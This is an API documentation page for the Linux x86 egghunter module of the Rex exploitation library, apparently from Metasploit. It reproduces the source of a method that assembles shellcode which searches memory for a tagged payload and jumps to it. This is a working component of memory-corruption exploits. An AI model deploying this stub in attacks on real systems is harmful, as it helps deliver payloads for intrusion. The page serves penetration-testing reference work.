Module: Rex::Exploitation::Egghunter::Linux::X86
- Defined in:
- lib/rex/exploitation/egghunter.rb
Constant Summary collapse
- Alias =
ARCH_X86
Instance Method Summary collapse
-
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
Instance Method Details
#hunter_stub(payload, badchars = '', opts = {}) ⇒ Object
The egg hunter stub for linux/x86.
112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 |
# File 'lib/rex/exploitation/egghunter.rb', line 112 def hunter_stub(payload, badchars = '', opts = {}) startreg = opts[:startreg] raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4 marker = "0x%x" % opts[:eggtag].unpack('V').first checksum = checksum_stub(payload, badchars, opts) startstub = '' if startreg if startreg.downcase != 'ecx' startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr" else startstub = "\n\tjmp next_addr" end end startstub << "\n\t" if startstub.length > 0 assembly = <<EOS cld #{startstub} check_readable: or cx,0xfff next_addr: inc ecx push 0x43 ; use 'sigaction' syscall pop eax int 0x80 cmp al,0xf2 je check_readable check_for_tag: ; check that the tag matches once mov eax,#{marker} mov edi,ecx scasd jne next_addr ; it must match a second time too scasd jne next_addr ; check the checksum if the feature is enabled #{checksum} ; jump to the payload jmp edi EOS assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string # return the stub assembled_code end |